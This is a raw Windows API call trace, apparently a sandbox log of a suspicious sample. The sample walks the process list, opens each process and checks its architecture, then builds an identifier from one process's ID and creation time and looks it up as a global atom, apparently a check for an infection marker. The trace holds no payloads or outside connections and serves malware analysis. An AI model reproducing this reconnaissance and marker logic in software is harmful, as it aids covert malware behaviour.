	[0127.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0127.859] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.859] CloseHandle (hObject=0x2dc) returned 1
	[0127.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0127.859] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.860] CloseHandle (hObject=0x2dc) returned 1
	[0127.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0127.860] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.860] CloseHandle (hObject=0x2dc) returned 1
	[0127.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0127.860] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.860] CloseHandle (hObject=0x2dc) returned 1
	[0127.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0127.861] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.861] CloseHandle (hObject=0x2dc) returned 1
	[0127.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0127.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0127.862] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.862] CloseHandle (hObject=0x2dc) returned 1
	[0127.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0127.862] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.862] CloseHandle (hObject=0x2dc) returned 1
	[0127.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0127.863] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.863] CloseHandle (hObject=0x2dc) returned 1
	[0127.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0127.863] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.863] CloseHandle (hObject=0x2dc) returned 1
	[0127.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0127.864] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.864] CloseHandle (hObject=0x2dc) returned 1
	[0127.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0127.864] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.864] CloseHandle (hObject=0x2dc) returned 1
	[0127.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0127.864] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.864] CloseHandle (hObject=0x2dc) returned 1
	[0127.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0127.865] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.865] CloseHandle (hObject=0x2dc) returned 1
	[0127.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0127.865] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.865] CloseHandle (hObject=0x2dc) returned 1
	[0127.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0127.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.866] CloseHandle (hObject=0x2dc) returned 1
	[0127.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0127.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.866] CloseHandle (hObject=0x2dc) returned 1
	[0127.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0127.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.867] CloseHandle (hObject=0x2dc) returned 1
	[0127.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0127.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.867] CloseHandle (hObject=0x2dc) returned 1
	[0127.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0127.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.867] CloseHandle (hObject=0x2dc) returned 1
	[0127.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0127.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.868] CloseHandle (hObject=0x2dc) returned 1
	[0127.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0127.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.868] CloseHandle (hObject=0x2dc) returned 1
	[0127.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0127.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.869] CloseHandle (hObject=0x2dc) returned 1
	[0127.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0127.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.869] CloseHandle (hObject=0x2dc) returned 1
	[0127.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0127.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.870] CloseHandle (hObject=0x2dc) returned 1
	[0127.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0127.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.870] CloseHandle (hObject=0x2dc) returned 1
	[0127.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0127.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.870] CloseHandle (hObject=0x2dc) returned 1
	[0127.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.871] CloseHandle (hObject=0x2dc) returned 1
	[0127.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.871] GetLastError () returned 0x5
	[0127.871] GetLastError () returned 0x5
	[0127.871] GetLastError () returned 0x5
	[0127.871] GetLastError () returned 0x5
	[0127.871] GetLastError () returned 0x5
	[0127.871] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.872] GetLastError () returned 0x5
	[0127.873] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.985] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.985] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.986] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.987] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetLastError () returned 0x5
	[0127.988] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.988] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.988] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.988] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.989] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.989] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.989] CloseHandle (hObject=0x2dc) returned 1
	[0127.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0127.989] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.989] CloseHandle (hObject=0x2dc) returned 1
	[0127.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0127.990] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.990] CloseHandle (hObject=0x2dc) returned 1
	[0127.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0127.990] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.990] CloseHandle (hObject=0x2dc) returned 1
	[0127.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0127.991] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.991] CloseHandle (hObject=0x2dc) returned 1
	[0127.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0127.991] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.991] CloseHandle (hObject=0x2dc) returned 1
	[0127.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0128.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
